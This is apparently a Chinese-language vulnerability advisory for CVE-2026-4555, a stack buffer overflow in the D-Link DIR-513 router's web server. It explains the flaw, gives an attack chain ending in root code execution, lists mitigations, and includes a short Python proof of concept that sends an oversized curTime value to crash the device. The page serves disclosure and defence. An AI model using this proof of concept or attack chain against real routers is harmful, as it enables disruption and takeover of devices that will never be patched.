CVE-2026-4555 CVSS 8.8 高危

CVE-2026-4555 D-Link DIR-513 堆栈缓冲区溢出漏洞

披露日期: 2026-03-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4555

漏洞类型

堆栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-513

漏洞概述

D-Link DIR-513路由器固件1.10版本中存在一个高危安全漏洞。该漏洞源于boa组件中的`formEasySetTimezone`函数未能正确处理用户输入。攻击者可以通过向`/goform/formEasySetTimezone`接口发送特制的`curTime`参数，触发堆栈缓冲区溢出。由于该攻击可远程发起且无需用户交互，成功利用可能导致设备崩溃或被远程控制。鉴于该产品已停止维护，用户面临极高风险。

技术细节

该漏洞发生在D-Link DIR-513的Web服务器组件boa中。具体受影响的文件路径为`/goform/formEasySetTimezone`，对应的处理函数为`formEasySetTimezone`。在处理HTTP请求时，程序提取了`curTime`参数的值，并直接将其拷贝到栈上的固定大小缓冲区中，而未对输入数据的长度进行必要的边界检查。这种不安全的内存操作（如使用不安全的字符串拷贝函数）使得攻击者能够通过提交超长的字符串数据覆盖栈上的返回地址。由于CVSS向量显示攻击复杂度低（AC:L）且无需权限（PR:L），攻击者可以构造恶意Payload覆盖返回地址，劫持程序执行流，最终在目标设备上实现任意代码执行。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露在互联网或内网中的D-Link DIR-513设备，并确定其固件版本为1.10。

STEP 2

漏洞利用

攻击者向目标设备的`/goform/formEasySetTimezone`接口发送POST请求，并在`curTime`参数中注入精心构造的超长恶意数据。

STEP 3

溢出触发

由于程序未校验数据长度，超长数据覆盖栈上的返回地址，导致缓冲区溢出，程序流程被劫持。

STEP 4

代码执行

CPU跳转到攻击者控制的地址执行Shellcode，从而获取设备的远程控制权限（Root权限）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_ip = "192.168.0.1"  # Replace with actual target IP
url = f"http://{target_ip}/goform/formEasySetTimezone"

# Malicious payload to trigger stack-based buffer overflow
# The length depends on the specific buffer size, usually a pattern is used for fuzzing
# Example: 'A' * 500 + Ret Address
payload = "A" * 600

data = {
    "curTime": payload
}

try:
    print(f"Sending exploit payload to {url}...")
    response = requests.post(url, data=data, timeout=5)
    print(f"Response Status Code: {response.status_code}")
    # Check if device is responsive or if behavior indicates a crash
except requests.exceptions.RequestException as e:
    print(f"Request failed (Device might have crashed): {e}")

影响范围

D-Link DIR-513 1.10

防御指南

临时缓解措施

该漏洞影响的产品D-Link DIR-513已不再受官方维护，因此不会有官方补丁发布。作为临时缓解措施，用户应关闭路由器的远程管理功能，并修改默认管理员密码以增加攻击难度。最彻底的解决方案是更换仍在安全维护期内的网络设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4555
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4555
3 Details https://www.cvedetails.com/cve/CVE-2026-4555/
4 VulDB https://vuldb.com/cve/CVE-2026-4555
5 Link https://github.com/Litengzheng/vul_db/blob/main/Dir513/vul_24/README.md
6 Link https://vuldb.com/?ctiid.352382
7 Link https://vuldb.com/?id.352382
8 Link https://vuldb.com/?submit.774936
9 Link https://www.dlink.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表